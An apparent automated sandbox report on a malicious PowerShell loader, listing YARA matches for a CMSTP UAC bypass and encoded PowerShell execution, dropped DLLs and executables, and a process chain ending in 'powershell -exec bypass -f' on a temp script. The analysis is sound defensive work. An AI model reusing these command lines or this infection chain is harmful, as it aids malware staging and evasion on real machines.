Source: unknown	HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.4:49746 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_4888.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 10.2.Set-up.exe.3a53944.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.Set-up.exe.38b6544.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.Set-up.exe.3afd877.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.Set-up.exe.3b42944.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.Set-up.exe.38b5944.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.msiexec.exe.4c266cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.msiexec.exe.4c25acd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.Set-up.exe.3a54544.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.Set-up.exe.3b43544.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.more.com.526e6cd.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.Set-up.exe.3870877.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.more.com.5228a00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.more.com.526dacd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.Set-up.exe.3a0e877.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.msiexec.exe.4be0a00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4888, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB643A6	3_2_6BB643A6
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BBAA3DD	3_2_6BBAA3DD
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB6A2A7	3_2_6BB6A2A7
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB63A1C	3_2_6BB63A1C
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB67270	3_2_6BB67270
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BBF7A5A	3_2_6BBF7A5A
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB521F0	3_2_6BB521F0
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB80919	3_2_6BB80919
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB7911E	3_2_6BB7911E
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB67093	3_2_6BB67093
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB697A0	3_2_6BB697A0
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB68F83	3_2_6BB68F83
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB6867F	3_2_6BB6867F
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB63DD0	3_2_6BB63DD0
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB7457E	3_2_6BB7457E
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB69D65	3_2_6BB69D65

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\UPEC\QtGui4.dll D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: String function: 6BB60C80 appears 39 times

Source: Resource.ct.0.dr

Static PE information: Number of sections : 14 > 10

Source: amsi64_4888.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 10.2.Set-up.exe.3a53944.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.Set-up.exe.38b6544.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.Set-up.exe.3afd877.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.Set-up.exe.3b42944.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.Set-up.exe.38b5944.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.msiexec.exe.4c266cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.msiexec.exe.4c25acd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.Set-up.exe.3a54544.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.Set-up.exe.3b43544.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.more.com.526e6cd.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.Set-up.exe.3870877.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.more.com.5228a00.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.more.com.526dacd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.Set-up.exe.3a0e877.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.msiexec.exe.4be0a00.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: powershell.exe PID: 4888, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: UpdateClient.dll.0.dr, SimpleZip.cs	Cryptographic APIs: 'CreateDecryptor'
Source: UpdateClient.dll.0.dr, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: UpdateClient.dll.0.dr, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: UpdateCommon.dll.0.dr, SimpleZip.cs	Cryptographic APIs: 'CreateDecryptor'
Source: UpdateCommon.dll.0.dr, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: UpdateCommon.dll.0.dr, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: UpdateCommon.dll.0.dr, InstalledModule.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winPS1@14/221@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\jcysbXpH.zip

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcb0yw4p.msi.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: shdocvw.dll	Jump to behavior
